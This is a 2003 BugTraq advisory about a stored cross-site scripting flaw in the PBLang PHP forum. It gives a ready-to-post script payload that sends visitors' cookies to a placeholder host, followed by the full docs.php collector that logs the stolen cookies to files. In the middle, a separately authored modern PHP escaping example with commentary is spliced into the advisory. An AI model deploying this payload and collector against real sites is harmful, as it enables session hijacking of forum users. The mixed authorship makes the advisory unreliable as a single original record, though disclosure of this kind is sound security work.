BugTraq
PBLang Forum XSS Vul Jul 25 2003 12:54PM
Quan Van Truong Bui (quan_vu_208cn yahoo com)


PBLang is a web forum written in PHP. A security vulnerability in the product allows posting of HTML code and JavaScript into existing web pages, causing it to be executed on the client end (a Cross-Site Scripting vulnerability).

|--------------------------------------------|
Vulnerable systems: PBLang forum
Version: 4.0 or lower
Website: http://pblang.drmartinus.de/
Problem: Cross Site Scripting (XSS)
|--------------------------------------------|

If someone inserts <script>`anyscript`</script> instead of the post's content, the JavaScript code is executed by Internet Explorer or some other web browsers. This allows stealing of cookie data and other interesting things...

Exploit:

Inserting a new topic (or reply) with the following script will send visitors' cookies to your host. The output is saved to http://your-host/cookie.txt

*----------------------------------------------------------------------------------------------*

<script>window.open("http://your-host/docs.php?docs="+escape(document.cookie), "subwindows", "height=100,width=486")</script>

*----------------------------------------------------------------------------------------------*

Or insert any script, JavaScript and HTML (ex: javascript:history.go(-1), window.write("Hello world"), javascript:alert("Hi!!!"), ...).
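The output-side fix for this class of bug, as an added example that is neither PBLang's code nor the poster's: escape the stored post body when it is rendered, and only link http(s) URLs so the javascript: forms listed above never become an href. The helper names render_post_body() and safe_link_href() are assumptions.

```php
<?php
// Added example, not PBLang's code. Hypothetical helpers a forum would call
// on output, so a stored post such as the advisory's <script> payload is
// shown as text instead of being executed.

// Escape a stored post body for insertion into HTML element content.
function render_post_body(string $body): string
{
    // ENT_QUOTES escapes both quote styles, so the result is also safe
    // inside attribute values; nl2br keeps the author's line breaks.
    return nl2br(htmlspecialchars($body, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'));
}

// Return an escaped href only for http(s) URLs; anything else (javascript:,
// data:, vbscript:) is rejected, which covers the javascript: links listed
// in the advisory. Returns null when the URL must not be linked.
function safe_link_href(string $url): ?string
{
    $parts = parse_url(trim($url));
    if ($parts === false || !isset($parts['scheme'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    return htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Defence in depth: an HttpOnly session cookie is not readable through
// document.cookie, so a missed injection cannot exfiltrate it this way.
// Must run before session_start().
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);

// Constructed sample input: the cookie-stealing payload from the advisory,
// stored verbatim as a post body.
$stored = '<script>window.open("http://your-host/docs.php?docs="'
        . '+escape(document.cookie), "subwindows", "height=100,width=486")</script>';
echo render_post_body($stored), "\n";

foreach (['javascript:alert(\'Hi!!!\')', 'https://pblang.drmartinus.de/'] as $u) {
    $href = safe_link_href($u);
    echo $u, ' => ', $href === null ? '(rejected)' : '<a href="' . $href . '">', "\n";
}
```

Escaping on output rather than on input means posts already stored with a payload are neutralised as well, and the HttpOnly flag limits what any remaining injection can reach.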

* Code of docs.php:*

*-------------------------------------------------docs.php-------------------------------------------*

<?php
//Copyright by W_Hat (www.pcworldvn.com)
// Written for PHP 4: $HTTP_GET_VARS is the old name for $_GET and
// $REMOTE_ADDR is only set when register_globals is on.

define ("LINE", "\r\n");
define ("HTML_LINE", "<br>");

// Echo every key/value in $arr and return the same data as a text block.
function getvars($arr, $title)
{
    $res = "";
    $len = count($arr);
    if ($len>0)
    {
        if (strlen($title)>0)
        {
            print("[--------$title--------]" . HTML_LINE);
            $res .= "[--------$title--------]" . LINE;
        }
        foreach ($arr as $key => $value)
        {
            print("[$key]" . HTML_LINE);
            print($arr[$key] . HTML_LINE);
            $res .= "[$key]" . LINE . $arr[$key] . LINE;
        }
    }
    return $res;
}

// get current date
$now = date("Y-m-d H:i:s");

// init
$myData = "[-----$now-----]" . LINE;

// get
$myData .= getvars($HTTP_GET_VARS, "");

// file (one log file per client address, appended to)
$file = $REMOTE_ADDR . "cookie.txt";
$mode = "r+";
if (!file_exists($file))
    $mode = "w+";
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
?>

-------------------------------------------------docs.php-------------------------------------------*

Name: Quan Van Truong
E-Mail: quan_vu_208cn (at) yahoo (dot) com [email concealed]
Occupation: Bug Hunter

Copyright 2010, SecurityFocus